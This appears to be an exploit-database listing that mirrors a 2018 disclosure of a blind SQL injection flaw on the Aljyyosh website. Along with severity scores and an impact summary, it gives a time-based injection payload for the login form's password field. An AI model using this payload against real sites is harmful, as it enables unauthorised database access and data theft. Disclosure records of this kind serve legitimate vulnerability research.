Advertisement






Aljyyosh Blind SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Aljyyosh High Remote 2018-01-22
CPE
cpe:cpe:/a:NA:NA:NA
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010220

Below is a copy:

Aljyyosh Blind SQL Injection Vulnerability
# Exploit Title: Aljyyosh Blind SQL Injection Vulnerability
# Google Dork: N/A
# Date: 2018-01-20
# Risk: High
# Exploit Author: Iran.Anonymous
# Vendor Homepage: http://www.aljyyosh.org/
# Tested on: Windows
*******************************************
# The impact of this vulnerability

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

# Attack details:

URL encoded POST input {password} was set to : 

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

*******************************************
# Thanks to : ~~> MR.Khatar || Turk.Khan || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY
# Discovered By: Iran.Anonymous

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum